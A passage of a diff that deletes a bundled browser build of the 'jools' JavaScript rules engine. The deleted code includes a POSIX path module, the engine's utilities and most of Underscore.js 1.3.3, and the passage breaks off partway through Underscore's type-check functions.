-function filter (xs, fn) {
-    var res = [];
-    for (var i = 0; i < xs.length; i++) {
-        if (fn(xs[i], i, xs)) res.push(xs[i]);
-    }
-    return res;
-}
-
-/**
- * resolves . and .. elements in a path array with directory names there
- * must be no slashes, empty elements, or device names (c:\) in the array
- * (so also no leading and trailing slashes - it does not distinguish
- * relative and absolute paths)
- * @memberof browser_jools
- * @param parts 
- * @param allowAboveRoot 
- */
-function normalizeArray(parts, allowAboveRoot) {
-  // if the path tries to go above the root, `up` ends up > 0
-  var up = 0;
-  for (var i = parts.length; i >= 0; i--) {
-    var last = parts[i];
-    if (last == '.') {
-      parts.splice(i, 1);
-    } else if (last === '..') {
-      parts.splice(i, 1);
-      up++;
-    } else if (up) {
-      parts.splice(i, 1);
-      up--;
-    }
-  }
-
-  // if the path is allowed to go above the root, restore leading ..s
-  if (allowAboveRoot) {
-    for (; up--; up) {
-      parts.unshift('..');
-    }
-  }
-
-  return parts;
-}
-
-// Regex to split a filename into [*, dir, basename, ext]
-// posix version
-var splitPathRe = /^(.+\/(?!$)|\/)?((?:.+?)?(\.[^.]*)?)$/;
-
-// path.resolve([from ...], to)
-// posix version
-exports.resolve = function() {
-var resolvedPath = '',
-    resolvedAbsolute = false;
-
-for (var i = arguments.length; i >= -1 && !resolvedAbsolute; i--) {
-  var path = (i >= 0)
-      ? arguments[i]
-      : process.cwd();
-
-  // Skip empty and invalid entries
-  if (typeof path !== 'string' || !path) {
-    continue;
-  }
-
-  resolvedPath = path + '/' + resolvedPath;
-  resolvedAbsolute = path.charAt(0) === '/';
-}
-
-// At this point the path should be resolved to a full absolute path, but
-// handle relative paths to be safe (might happen when process.cwd() fails)
-
-// Normalize the path
-resolvedPath = normalizeArray(filter(resolvedPath.split('/'), function(p) {
-    return !!p;
-  }), !resolvedAbsolute).join('/');
-
-  return ((resolvedAbsolute ? '/' : '') + resolvedPath) || '.';
-};
-
-// path.normalize(path)
-// posix version
-exports.normalize = function(path) {
-var isAbsolute = path.charAt(0) === '/',
-    trailingSlash = path.slice(-1) === '/';
-
-// Normalize the path
-path = normalizeArray(filter(path.split('/'), function(p) {
-    return !!p;
-  }), !isAbsolute).join('/');
-
-  if (!path && !isAbsolute) {
-    path = '.';
-  }
-  if (path && trailingSlash) {
-    path += '/';
-  }
-  
-  return (isAbsolute ? '/' : '') + path;
-};
-
-
-// posix version
-exports.join = function() {
-  var paths = Array.prototype.slice.call(arguments, 0);
-  return exports.normalize(filter(paths, function(p, index) {
-    return p && typeof p === 'string';
-  }).join('/'));
-};
-
-
-exports.dirname = function(path) {
-  var dir = splitPathRe.exec(path)[1] || '';
-  var isWindows = false;
-  if (!dir) {
-    // No dirname
-    return '.';
-  } else if (dir.length === 1 ||
-      (isWindows && dir.length <= 3 && dir.charAt(1) === ':')) {
-    // It is just a slash or a drive letter with a slash
-    return dir;
-  } else {
-    // It is a full dirname, strip trailing slash
-    return dir.substring(0, dir.length - 1);
-  }
-};
-
-
-exports.basename = function(path, ext) {
-  var f = splitPathRe.exec(path)[2] || '';
-  // TODO: make this comparison case-insensitive on windows?
-  if (ext && f.substr(-1 * ext.length) === ext) {
-    f = f.substr(0, f.length - ext.length);
-  }
-  return f;
-};
-
-
-exports.extname = function(path) {
-  return splitPathRe.exec(path)[3] || '';
-};
-
-});
-
-require.define("/node_modules/jools/package.json", function (require, module, exports, __dirname, __filename) {
-module.exports = {"main":"./lib/jools"}
-});
-
-require.define("/node_modules/jools/lib/jools.js", function (require, module, exports, __dirname, __filename) {
-/**
- * Module dependencies.
- */
-var utils = require('./utils')
-  , _ = require('underscore');
-
-/**
- * version
- * @memberof browser_jools
- */
-exports.version = '0.0.1';
-
-/**
- * Jools constructor.
- *
- * A rule consists of:
- *   - Descriptive name
- *   - One or more conditions
- *   - One or more consequences, which are fired when all conditions evaluate to true.
- * @memberof browser_jools
- * @param {Object} rules
- */
-function Jools(rules) {
-  this.rules = rules;
-}
-
-/**
- * execute rules with fact
- *
- * @param {Object} fact
- */
-Jools.prototype.execute = function (fact) {
-  var self = this
-    , session = _.clone(fact)
-    , last_session = _.clone(fact)
-    , goal = false;
-
-  while (!goal) {
-    var changes = false;
-    for (var x=0; x < this.rules.length; x++) {
-      var rule = this.rules[x]
-        , outcome;
-
-      _.flatten([rule.condition]).forEach(function (cnd) {
-        cnd.__args = cnd.__args || utils.paramNames(cnd); 
-
-        if (outcome) {
-          outcome = outcome && cnd.apply({}, utils.paramsToArguments(session, cnd.__args)); 
-        } else {
-          outcome = cnd.apply({}, utils.paramsToArguments(session, cnd.__args));
-        }
-      });
-      if (outcome) {
-        _.flatten([rule.consequence]).forEach(function (csq) {
-          csq.__args = csq.__args || utils.paramNames(csq); 
-          csq.apply(session, utils.paramsToArguments(fact, csq.__args));
-          if (!_.isEqual(last_session,session)) {
-            // Fire all rules again!
-            changes = true;
-            last_session = _.clone(session);
-          } 
-        });
-      }
-      if(changes) break;
-    }
-    if (!changes) goal = true;
-  }
-  return session;
-};
-
-module.exports = Jools;
-
-
-});
-
-require.define("/node_modules/jools/lib/utils.js", function (require, module, exports, __dirname, __filename) {
-/**
- * Returns an array of parameter names of the function f
- * @memberof browser_jools
- * @param {Function} f
- */
-module.exports.paramNames = function (f) {
-  var m = /function[^\(]*\(([^\)]*)\)/.exec(f.toString());
-  if (!m) throw new TypeError("Invalid functions");
-
-  var params = [];
-  m[1].split(',').forEach(function (p) {
-    params.push(p.replace(/^\s*|\s*$/g, ''));
-  });
-
-  return params;
-};
-
-/**
- * Creates an array of arguments
- * @memberof browser_jools
- * @param {Object} obj
- * @param {Array} params
- */
-module.exports.paramsToArguments = function (obj, params) {
-  var args = [];
-  params.forEach(function (p) {
-    args.push(obj[p]);
-  });
-  return args;
-}
-
-
-});
-
-require.define("/node_modules/underscore/package.json", function (require, module, exports, __dirname, __filename) {
-module.exports = {"main":"underscore.js"}
-});
-
-require.define("/node_modules/underscore/underscore.js", function (require, module, exports, __dirname, __filename) {
-//     Underscore.js 1.3.3
-//     (c) 2009-2012 Jeremy Ashkenas, DocumentCloud Inc.
-//     Underscore is freely distributable under the MIT license.
-//     Portions of Underscore are inspired or borrowed from Prototype,
-//     Oliver Steele's Functional, and John Resig's Micro-Templating.
-//     For all details and documentation:
-//     http://documentcloud.github.com/underscore
-
-(function() {
-
-  // Baseline setup
-  // --------------
-
-  // Establish the root object, `window` in the browser, or `global` on the server.
-  var root = this;
-
-  // Save the previous value of the `_` variable.
-  var previousUnderscore = root._;
-
-  // Establish the object that gets returned to break out of a loop iteration.
-  var breaker = {};
-
-  // Save bytes in the minified (but not gzipped) version:
-  var ArrayProto = Array.prototype, ObjProto = Object.prototype, FuncProto = Function.prototype;
-
-  // Create quick reference variables for speed access to core prototypes.
-  var slice            = ArrayProto.slice,
-      unshift          = ArrayProto.unshift,
-      toString         = ObjProto.toString,
-      hasOwnProperty   = ObjProto.hasOwnProperty;
-
-  // All **ECMAScript 5** native function implementations that we hope to use
-  // are declared here.
-  var
-    nativeForEach      = ArrayProto.forEach,
-    nativeMap          = ArrayProto.map,
-    nativeReduce       = ArrayProto.reduce,
-    nativeReduceRight  = ArrayProto.reduceRight,
-    nativeFilter       = ArrayProto.filter,
-    nativeEvery        = ArrayProto.every,
-    nativeSome         = ArrayProto.some,
-    nativeIndexOf      = ArrayProto.indexOf,
-    nativeLastIndexOf  = ArrayProto.lastIndexOf,
-    nativeIsArray      = Array.isArray,
-    nativeKeys         = Object.keys,
-    nativeBind         = FuncProto.bind;
-
-  // Create a safe reference to the Underscore object for use below.
-  var _ = function(obj) { return new wrapper(obj); };
-
-  // Export the Underscore object for **Node.js**, with
-  // backwards-compatibility for the old `require()` API. If we're in
-  // the browser, add `_` as a global object via a string identifier,
-  // for Closure Compiler "advanced" mode.
-  if (typeof exports !== 'undefined') {
-    if (typeof module !== 'undefined' && module.exports) {
-      exports = module.exports = _;
-    }
-    exports._ = _;
-  } else {
-    root['_'] = _;
-  }
-
-  // Current version.
-  _.VERSION = '1.3.3';
-
-  // Collection Functions
-  // --------------------
-
-  // The cornerstone, an `each` implementation, aka `forEach`.
-  // Handles objects with the built-in `forEach`, arrays, and raw objects.
-  // Delegates to **ECMAScript 5**'s native `forEach` if available.
-  var each = _.each = _.forEach = function(obj, iterator, context) {
-    if (obj == null) return;
-    if (nativeForEach && obj.forEach === nativeForEach) {
-      obj.forEach(iterator, context);
-    } else if (obj.length === +obj.length) {
-      for (var i = 0, l = obj.length; i < l; i++) {
-        if (i in obj && iterator.call(context, obj[i], i, obj) === breaker) return;
-      }
-    } else {
-      for (var key in obj) {
-        if (_.has(obj, key)) {
-          if (iterator.call(context, obj[key], key, obj) === breaker) return;
-        }
-      }
-    }
-  };
-
-  // Return the results of applying the iterator to each element.
-  // Delegates to **ECMAScript 5**'s native `map` if available.
-  _.map = _.collect = function(obj, iterator, context) {
-    var results = [];
-    if (obj == null) return results;
-    if (nativeMap && obj.map === nativeMap) return obj.map(iterator, context);
-    each(obj, function(value, index, list) {
-      results[results.length] = iterator.call(context, value, index, list);
-    });
-    if (obj.length === +obj.length) results.length = obj.length;
-    return results;
-  };
-
-  // **Reduce** builds up a single result from a list of values, aka `inject`,
-  // or `foldl`. Delegates to **ECMAScript 5**'s native `reduce` if available.
-  _.reduce = _.foldl = _.inject = function(obj, iterator, memo, context) {
-    var initial = arguments.length > 2;
-    if (obj == null) obj = [];
-    if (nativeReduce && obj.reduce === nativeReduce) {
-      if (context) iterator = _.bind(iterator, context);
-      return initial ? obj.reduce(iterator, memo) : obj.reduce(iterator);
-    }
-    each(obj, function(value, index, list) {
-      if (!initial) {
-        memo = value;
-        initial = true;
-      } else {
-        memo = iterator.call(context, memo, value, index, list);
-      }
-    });
-    if (!initial) throw new TypeError('Reduce of empty array with no initial value');
-    return memo;
-  };
-
-  // The right-associative version of reduce, also known as `foldr`.
-  // Delegates to **ECMAScript 5**'s native `reduceRight` if available.
-  _.reduceRight = _.foldr = function(obj, iterator, memo, context) {
-    var initial = arguments.length > 2;
-    if (obj == null) obj = [];
-    if (nativeReduceRight && obj.reduceRight === nativeReduceRight) {
-      if (context) iterator = _.bind(iterator, context);
-      return initial ? obj.reduceRight(iterator, memo) : obj.reduceRight(iterator);
-    }
-    var reversed = _.toArray(obj).reverse();
-    if (context && !initial) iterator = _.bind(iterator, context);
-    return initial ? _.reduce(reversed, iterator, memo, context) : _.reduce(reversed, iterator);
-  };
-
-  // Return the first value which passes a truth test. Aliased as `detect`.
-  _.find = _.detect = function(obj, iterator, context) {
-    var result;
-    any(obj, function(value, index, list) {
-      if (iterator.call(context, value, index, list)) {
-        result = value;
-        return true;
-      }
-    });
-    return result;
-  };
-
-  // Return all the elements that pass a truth test.
-  // Delegates to **ECMAScript 5**'s native `filter` if available.
-  // Aliased as `select`.
-  _.filter = _.select = function(obj, iterator, context) {
-    var results = [];
-    if (obj == null) return results;
-    if (nativeFilter && obj.filter === nativeFilter) return obj.filter(iterator, context);
-    each(obj, function(value, index, list) {
-      if (iterator.call(context, value, index, list)) results[results.length] = value;
-    });
-    return results;
-  };
-
-  // Return all the elements for which a truth test fails.
-  _.reject = function(obj, iterator, context) {
-    var results = [];
-    if (obj == null) return results;
-    each(obj, function(value, index, list) {
-      if (!iterator.call(context, value, index, list)) results[results.length] = value;
-    });
-    return results;
-  };
-
-  // Determine whether all of the elements match a truth test.
-  // Delegates to **ECMAScript 5**'s native `every` if available.
-  // Aliased as `all`.
-  _.every = _.all = function(obj, iterator, context) {
-    var result = true;
-    if (obj == null) return result;
-    if (nativeEvery && obj.every === nativeEvery) return obj.every(iterator, context);
-    each(obj, function(value, index, list) {
-      if (!(result = result && iterator.call(context, value, index, list))) return breaker;
-    });
-    return !!result;
-  };
-
-  // Determine if at least one element in the object matches a truth test.
-  // Delegates to **ECMAScript 5**'s native `some` if available.
-  // Aliased as `any`.
-  var any = _.some = _.any = function(obj, iterator, context) {
-    iterator || (iterator = _.identity);
-    var result = false;
-    if (obj == null) return result;
-    if (nativeSome && obj.some === nativeSome) return obj.some(iterator, context);
-    each(obj, function(value, index, list) {
-      if (result || (result = iterator.call(context, value, index, list))) return breaker;
-    });
-    return !!result;
-  };
-
-  // Determine if a given value is included in the array or object using `===`.
-  // Aliased as `contains`.
-  _.include = _.contains = function(obj, target) {
-    var found = false;
-    if (obj == null) return found;
-    if (nativeIndexOf && obj.indexOf === nativeIndexOf) return obj.indexOf(target) != -1;
-    found = any(obj, function(value) {
-      return value === target;
-    });
-    return found;
-  };
-
-  // Invoke a method (with arguments) on every item in a collection.
-  _.invoke = function(obj, method) {
-    var args = slice.call(arguments, 2);
-    return _.map(obj, function(value) {
-      return (_.isFunction(method) ? method || value : value[method]).apply(value, args);
-    });
-  };
-
-  // Convenience version of a common use case of `map`: fetching a property.
-  _.pluck = function(obj, key) {
-    return _.map(obj, function(value){ return value[key]; });
-  };
-
-  // Return the maximum element or (element-based computation).
-  _.max = function(obj, iterator, context) {
-    if (!iterator && _.isArray(obj) && obj[0] === +obj[0]) return Math.max.apply(Math, obj);
-    if (!iterator && _.isEmpty(obj)) return -Infinity;
-    var result = {computed : -Infinity};
-    each(obj, function(value, index, list) {
-      var computed = iterator ? iterator.call(context, value, index, list) : value;
-      computed >= result.computed && (result = {value : value, computed : computed});
-    });
-    return result.value;
-  };
-
-  // Return the minimum element (or element-based computation).
-  _.min = function(obj, iterator, context) {
-    if (!iterator && _.isArray(obj) && obj[0] === +obj[0]) return Math.min.apply(Math, obj);
-    if (!iterator && _.isEmpty(obj)) return Infinity;
-    var result = {computed : Infinity};
-    each(obj, function(value, index, list) {
-      var computed = iterator ? iterator.call(context, value, index, list) : value;
-      computed < result.computed && (result = {value : value, computed : computed});
-    });
-    return result.value;
-  };
-
-  // Shuffle an array.
-  _.shuffle = function(obj) {
-    var shuffled = [], rand;
-    each(obj, function(value, index, list) {
-      rand = Math.floor(Math.random() * (index + 1));
-      shuffled[index] = shuffled[rand];
-      shuffled[rand] = value;
-    });
-    return shuffled;
-  };
-
-  // Sort the object's values by a criterion produced by an iterator.
-  _.sortBy = function(obj, val, context) {
-    var iterator = _.isFunction(val) ? val : function(obj) { return obj[val]; };
-    return _.pluck(_.map(obj, function(value, index, list) {
-      return {
-        value : value,
-        criteria : iterator.call(context, value, index, list)
-      };
-    }).sort(function(left, right) {
-      var a = left.criteria, b = right.criteria;
-      if (a === void 0) return 1;
-      if (b === void 0) return -1;
-      return a < b ? -1 : a > b ? 1 : 0;
-    }), 'value');
-  };
-
-  // Groups the object's values by a criterion. Pass either a string attribute
-  // to group by, or a function that returns the criterion.
-  _.groupBy = function(obj, val) {
-    var result = {};
-    var iterator = _.isFunction(val) ? val : function(obj) { return obj[val]; };
-    each(obj, function(value, index) {
-      var key = iterator(value, index);
-      (result[key] || (result[key] = [])).push(value);
-    });
-    return result;
-  };
-
-  // Use a comparator function to figure out at what index an object should
-  // be inserted so as to maintain order. Uses binary search.
-  _.sortedIndex = function(array, obj, iterator) {
-    iterator || (iterator = _.identity);
-    var low = 0, high = array.length;
-    while (low < high) {
-      var mid = (low + high) >> 1;
-      iterator(array[mid]) < iterator(obj) ? low = mid + 1 : high = mid;
-    }
-    return low;
-  };
-
-  // Safely convert anything iterable into a real, live array.
-  _.toArray = function(obj) {
-    if (!obj)                                     return [];
-    if (_.isArray(obj))                           return slice.call(obj);
-    if (_.isArguments(obj))                       return slice.call(obj);
-    if (obj.toArray && _.isFunction(obj.toArray)) return obj.toArray();
-    return _.values(obj);
-  };
-
-  // Return the number of elements in an object.
-  _.size = function(obj) {
-    return _.isArray(obj) ? obj.length : _.keys(obj).length;
-  };
-
-  // Array Functions
-  // ---------------
-
-  // Get the first element of an array. Passing **n** will return the first N
-  // values in the array. Aliased as `head` and `take`. The **guard** check
-  // allows it to work with `_.map`.
-  _.first = _.head = _.take = function(array, n, guard) {
-    return (n != null) && !guard ? slice.call(array, 0, n) : array[0];
-  };
-
-  // Returns everything but the last entry of the array. Especcialy useful on
-  // the arguments object. Passing **n** will return all the values in
-  // the array, excluding the last N. The **guard** check allows it to work with
-  // `_.map`.
-  _.initial = function(array, n, guard) {
-    return slice.call(array, 0, array.length - ((n == null) || guard ? 1 : n));
-  };
-
-  // Get the last element of an array. Passing **n** will return the last N
-  // values in the array. The **guard** check allows it to work with `_.map`.
-  _.last = function(array, n, guard) {
-    if ((n != null) && !guard) {
-      return slice.call(array, Math.max(array.length - n, 0));
-    } else {
-      return array[array.length - 1];
-    }
-  };
-
-  // Returns everything but the first entry of the array. Aliased as `tail`.
-  // Especially useful on the arguments object. Passing an **index** will return
-  // the rest of the values in the array from that index onward. The **guard**
-  // check allows it to work with `_.map`.
-  _.rest = _.tail = function(array, index, guard) {
-    return slice.call(array, (index == null) || guard ? 1 : index);
-  };
-
-  // Trim out all falsy values from an array.
-  _.compact = function(array) {
-    return _.filter(array, function(value){ return !!value; });
-  };
-
-  // Return a completely flattened version of an array.
-  _.flatten = function(array, shallow) {
-    return _.reduce(array, function(memo, value) {
-      if (_.isArray(value)) return memo.concat(shallow ? value : _.flatten(value));
-      memo[memo.length] = value;
-      return memo;
-    }, []);
-  };
-
-  // Return a version of the array that does not contain the specified value(s).
-  _.without = function(array) {
-    return _.difference(array, slice.call(arguments, 1));
-  };
-
-  // Produce a duplicate-free version of the array. If the array has already
-  // been sorted, you have the option of using a faster algorithm.
-  // Aliased as `unique`.
-  _.uniq = _.unique = function(array, isSorted, iterator) {
-    var initial = iterator ? _.map(array, iterator) : array;
-    var results = [];
-    // The `isSorted` flag is irrelevant if the array only contains two elements.
-    if (array.length < 3) isSorted = true;
-    _.reduce(initial, function (memo, value, index) {
-      if (isSorted ? _.last(memo) !== value || !memo.length : !_.include(memo, value)) {
-        memo.push(value);
-        results.push(array[index]);
-      }
-      return memo;
-    }, []);
-    return results;
-  };
-
-  // Produce an array that contains the union: each distinct element from all of
-  // the passed-in arrays.
-  _.union = function() {
-    return _.uniq(_.flatten(arguments, true));
-  };
-
-  // Produce an array that contains every item shared between all the
-  // passed-in arrays. (Aliased as "intersect" for back-compat.)
-  _.intersection = _.intersect = function(array) {
-    var rest = slice.call(arguments, 1);
-    return _.filter(_.uniq(array), function(item) {
-      return _.every(rest, function(other) {
-        return _.indexOf(other, item) >= 0;
-      });
-    });
-  };
-
-  // Take the difference between one array and a number of other arrays.
-  // Only the elements present in just the first array will remain.
-  _.difference = function(array) {
-    var rest = _.flatten(slice.call(arguments, 1), true);
-    return _.filter(array, function(value){ return !_.include(rest, value); });
-  };
-
-  // Zip together multiple lists into a single array -- elements that share
-  // an index go together.
-  _.zip = function() {
-    var args = slice.call(arguments);
-    var length = _.max(_.pluck(args, 'length'));
-    var results = new Array(length);
-    for (var i = 0; i < length; i++) results[i] = _.pluck(args, "" + i);
-    return results;
-  };
-
-  // If the browser doesn't supply us with indexOf (I'm looking at you, **MSIE**),
-  // we need this function. Return the position of the first occurrence of an
-  // item in an array, or -1 if the item is not included in the array.
-  // Delegates to **ECMAScript 5**'s native `indexOf` if available.
-  // If the array is large and already in sort order, pass `true`
-  // for **isSorted** to use binary search.
-  _.indexOf = function(array, item, isSorted) {
-    if (array == null) return -1;
-    var i, l;
-    if (isSorted) {
-      i = _.sortedIndex(array, item);
-      return array[i] === item ? i : -1;
-    }
-    if (nativeIndexOf && array.indexOf === nativeIndexOf) return array.indexOf(item);
-    for (i = 0, l = array.length; i < l; i++) if (i in array && array[i] === item) return i;
-    return -1;
-  };
-
-  // Delegates to **ECMAScript 5**'s native `lastIndexOf` if available.
-  _.lastIndexOf = function(array, item) {
-    if (array == null) return -1;
-    if (nativeLastIndexOf && array.lastIndexOf === nativeLastIndexOf) return array.lastIndexOf(item);
-    var i = array.length;
-    while (i--) if (i in array && array[i] === item) return i;
-    return -1;
-  };
-
-  // Generate an integer Array containing an arithmetic progression. A port of
-  // the native Python `range()` function. See
-  // [the Python documentation](http://docs.python.org/library/functions.html#range).
-  _.range = function(start, stop, step) {
-    if (arguments.length <= 1) {
-      stop = start || 0;
-      start = 0;
-    }
-    step = arguments[2] || 1;
-
-    var len = Math.max(Math.ceil((stop - start) / step), 0);
-    var idx = 0;
-    var range = new Array(len);
-
-    while(idx < len) {
-      range[idx++] = start;
-      start += step;
-    }
-
-    return range;
-  };
-
-  // Function (ahem) Functions
-  // ------------------
-
-  // Reusable constructor function for prototype setting.
-  var ctor = function(){};
-
-  // Create a function bound to a given object (assigning `this`, and arguments,
-  // optionally). Binding with arguments is also known as `curry`.
-  // Delegates to **ECMAScript 5**'s native `Function.bind` if available.
-  // We check for `func.bind` first, to fail fast when `func` is undefined.
-  _.bind = function bind(func, context) {
-    var bound, args;
-    if (func.bind === nativeBind && nativeBind) return nativeBind.apply(func, slice.call(arguments, 1));
-    if (!_.isFunction(func)) throw new TypeError;
-    args = slice.call(arguments, 2);
-    return bound = function() {
-      if (!(this instanceof bound)) return func.apply(context, args.concat(slice.call(arguments)));
-      ctor.prototype = func.prototype;
-      var self = new ctor;
-      var result = func.apply(self, args.concat(slice.call(arguments)));
-      if (Object(result) === result) return result;
-      return self;
-    };
-  };
-
-  // Bind all of an object's methods to that object. Useful for ensuring that
-  // all callbacks defined on an object belong to it.
-  _.bindAll = function(obj) {
-    var funcs = slice.call(arguments, 1);
-    if (funcs.length == 0) funcs = _.functions(obj);
-    each(funcs, function(f) { obj[f] = _.bind(obj[f], obj); });
-    return obj;
-  };
-
-  // Memoize an expensive function by storing its results.
-  _.memoize = function(func, hasher) {
-    var memo = {};
-    hasher || (hasher = _.identity);
-    return function() {
-      var key = hasher.apply(this, arguments);
-      return _.has(memo, key) ? memo[key] : (memo[key] = func.apply(this, arguments));
-    };
-  };
-
-  // Delays a function for the given number of milliseconds, and then calls
-  // it with the arguments supplied.
-  _.delay = function(func, wait) {
-    var args = slice.call(arguments, 2);
-    return setTimeout(function(){ return func.apply(null, args); }, wait);
-  };
-
-  // Defers a function, scheduling it to run after the current call stack has
-  // cleared.
-  _.defer = function(func) {
-    return _.delay.apply(_, [func, 1].concat(slice.call(arguments, 1)));
-  };
-
-  // Returns a function, that, when invoked, will only be triggered at most once
-  // during a given window of time.
-  _.throttle = function(func, wait) {
-    var context, args, timeout, throttling, more, result;
-    var whenDone = _.debounce(function(){ more = throttling = false; }, wait);
-    return function() {
-      context = this; args = arguments;
-      var later = function() {
-        timeout = null;
-        if (more) func.apply(context, args);
-        whenDone();
-      };
-      if (!timeout) timeout = setTimeout(later, wait);
-      if (throttling) {
-        more = true;
-      } else {
-        result = func.apply(context, args);
-      }
-      whenDone();
-      throttling = true;
-      return result;
-    };
-  };
-
-  // Returns a function, that, as long as it continues to be invoked, will not
-  // be triggered. The function will be called after it stops being called for
-  // N milliseconds. If `immediate` is passed, trigger the function on the
-  // leading edge, instead of the trailing.
-  _.debounce = function(func, wait, immediate) {
-    var timeout;
-    return function() {
-      var context = this, args = arguments;
-      var later = function() {
-        timeout = null;
-        if (!immediate) func.apply(context, args);
-      };
-      if (immediate && !timeout) func.apply(context, args);
-      clearTimeout(timeout);
-      timeout = setTimeout(later, wait);
-    };
-  };
-
-  // Returns a function that will be executed at most one time, no matter how
-  // often you call it. Useful for lazy initialization.
-  _.once = function(func) {
-    var ran = false, memo;
-    return function() {
-      if (ran) return memo;
-      ran = true;
-      return memo = func.apply(this, arguments);
-    };
-  };
-
-  // Returns the first function passed as an argument to the second,
-  // allowing you to adjust arguments, run code before and after, and
-  // conditionally execute the original function.
-  _.wrap = function(func, wrapper) {
-    return function() {
-      var args = [func].concat(slice.call(arguments, 0));
-      return wrapper.apply(this, args);
-    };
-  };
-
-  // Returns a function that is the composition of a list of functions, each
-  // consuming the return value of the function that follows.
-  _.compose = function() {
-    var funcs = arguments;
-    return function() {
-      var args = arguments;
-      for (var i = funcs.length - 1; i >= 0; i--) {
-        args = [funcs[i].apply(this, args)];
-      }
-      return args[0];
-    };
-  };
-
-  // Returns a function that will only be executed after being called N times.
-  _.after = function(times, func) {
-    if (times <= 0) return func();
-    return function() {
-      if (--times < 1) { return func.apply(this, arguments); }
-    };
-  };
-
-  // Object Functions
-  // ----------------
-
-  // Retrieve the names of an object's properties.
-  // Delegates to **ECMAScript 5**'s native `Object.keys`
-  _.keys = nativeKeys || function(obj) {
-    if (obj !== Object(obj)) throw new TypeError('Invalid object');
-    var keys = [];
-    for (var key in obj) if (_.has(obj, key)) keys[keys.length] = key;
-    return keys;
-  };
-
-  // Retrieve the values of an object's properties.
-  _.values = function(obj) {
-    return _.map(obj, _.identity);
-  };
-
-  // Return a sorted list of the function names available on the object.
-  // Aliased as `methods`
-  _.functions = _.methods = function(obj) {
-    var names = [];
-    for (var key in obj) {
-      if (_.isFunction(obj[key])) names.push(key);
-    }
-    return names.sort();
-  };
-
-  // Extend a given object with all the properties in passed-in object(s).
-  _.extend = function(obj) {
-    each(slice.call(arguments, 1), function(source) {
-      for (var prop in source) {
-        obj[prop] = source[prop];
-      }
-    });
-    return obj;
-  };
-
-  // Return a copy of the object only containing the whitelisted properties.
-  _.pick = function(obj) {
-    var result = {};
-    each(_.flatten(slice.call(arguments, 1)), function(key) {
-      if (key in obj) result[key] = obj[key];
-    });
-    return result;
-  };
-
-  // Fill in a given object with default properties.
-  _.defaults = function(obj) {
-    each(slice.call(arguments, 1), function(source) {
-      for (var prop in source) {
-        if (obj[prop] == null) obj[prop] = source[prop];
-      }
-    });
-    return obj;
-  };
-
-  // Create a (shallow-cloned) duplicate of an object.
-  _.clone = function(obj) {
-    if (!_.isObject(obj)) return obj;
-    return _.isArray(obj) ? obj.slice() : _.extend({}, obj);
-  };
-
-  // Invokes interceptor with the obj, and then returns obj.
-  // The primary purpose of this method is to "tap into" a method chain, in
-  // order to perform operations on intermediate results within the chain.
-  _.tap = function(obj, interceptor) {
-    interceptor(obj);
-    return obj;
-  };
-
-  // Internal recursive comparison function.
-  function eq(a, b, stack) {
-    // Identical objects are equal. `0 === -0`, but they aren't identical.
-    // See the Harmony `egal` proposal: http://wiki.ecmascript.org/doku.php?id=harmony:egal.
-    if (a === b) return a !== 0 || 1 / a == 1 / b;
-    // A strict comparison is necessary because `null == undefined`.
-    if (a == null || b == null) return a === b;
-    // Unwrap any wrapped objects.
-    if (a._chain) a = a._wrapped;
-    if (b._chain) b = b._wrapped;
-    // Invoke a custom `isEqual` method if one is provided.
-    if (a.isEqual && _.isFunction(a.isEqual)) return a.isEqual(b);
-    if (b.isEqual && _.isFunction(b.isEqual)) return b.isEqual(a);
-    // Compare `[[Class]]` names.
-    var className = toString.call(a);
-    if (className != toString.call(b)) return false;
-    switch (className) {
-      // Strings, numbers, dates, and booleans are compared by value.
-      case '[object String]':
-        // Primitives and their corresponding object wrappers are equivalent; thus, `"5"` is
-        // equivalent to `new String("5")`.
-        return a == String(b);
-      case '[object Number]':
-        // `NaN`s are equivalent, but non-reflexive. An `egal` comparison is performed for
-        // other numeric values.
-        return a != +a ? b != +b : (a == 0 ? 1 / a == 1 / b : a == +b);
-      case '[object Date]':
-      case '[object Boolean]':
-        // Coerce dates and booleans to numeric primitive values. Dates are compared by their
-        // millisecond representations. Note that invalid dates with millisecond representations
-        // of `NaN` are not equivalent.
-        return +a == +b;
-      // RegExps are compared by their source patterns and flags.
-      case '[object RegExp]':
-        return a.source == b.source &&
-               a.global == b.global &&
-               a.multiline == b.multiline &&
-               a.ignoreCase == b.ignoreCase;
-    }
-    if (typeof a != 'object' || typeof b != 'object') return false;
-    // Assume equality for cyclic structures. The algorithm for detecting cyclic
-    // structures is adapted from ES 5.1 section 15.12.3, abstract operation `JO`.
-    var length = stack.length;
-    while (length--) {
-      // Linear search. Performance is inversely proportional to the number of
-      // unique nested structures.
-      if (stack[length] == a) return true;
-    }
-    // Add the first object to the stack of traversed objects.
-    stack.push(a);
-    var size = 0, result = true;
-    // Recursively compare objects and arrays.
-    if (className == '[object Array]') {
-      // Compare array lengths to determine if a deep comparison is necessary.
-      size = a.length;
-      result = size == b.length;
-      if (result) {
-        // Deep compare the contents, ignoring non-numeric properties.
-        while (size--) {
-          // Ensure commutative equality for sparse arrays.
-          if (!(result = size in a == size in b && eq(a[size], b[size], stack))) break;
-        }
-      }
-    } else {
-      // Objects with different constructors are not equivalent.
-      if ('constructor' in a != 'constructor' in b || a.constructor != b.constructor) return false;
-      // Deep compare objects.
-      for (var key in a) {
-        if (_.has(a, key)) {
-          // Count the expected number of properties.
-          size++;
-          // Deep compare each member.
-          if (!(result = _.has(b, key) && eq(a[key], b[key], stack))) break;
-        }
-      }
-      // Ensure that both objects contain the same number of properties.
-      if (result) {
-        for (key in b) {
-          if (_.has(b, key) && !(size--)) break;
-        }
-        result = !size;
-      }
-    }
-    // Remove the first object from the stack of traversed objects.
-    stack.pop();
-    return result;
-  }
-
-  // Perform a deep comparison to check if two objects are equal.
-  _.isEqual = function(a, b) {
-    return eq(a, b, []);
-  };
-
-  // Is a given array, string, or object empty?
-  // An "empty" object has no enumerable own-properties.
-  _.isEmpty = function(obj) {
-    if (obj == null) return true;
-    if (_.isArray(obj) || _.isString(obj)) return obj.length === 0;
-    for (var key in obj) if (_.has(obj, key)) return false;
-    return true;
-  };
-
-  // Is a given value a DOM element?
-  _.isElement = function(obj) {
-    return !!(obj && obj.nodeType == 1);
-  };
-
-  // Is a given value an array?
-  // Delegates to ECMA5's native Array.isArray
-  _.isArray = nativeIsArray || function(obj) {
-    return toString.call(obj) == '[object Array]';
-  };
-
-  // Is a given variable an object?
-  _.isObject = function(obj) {
-    return obj === Object(obj);
-  };
-
-  // Is a given variable an arguments object?
-  _.isArguments = function(obj) {
-    return toString.call(obj) == '[object Arguments]';
-  };
-  if (!_.isArguments(arguments)) {
-    _.isArguments = function(obj) {
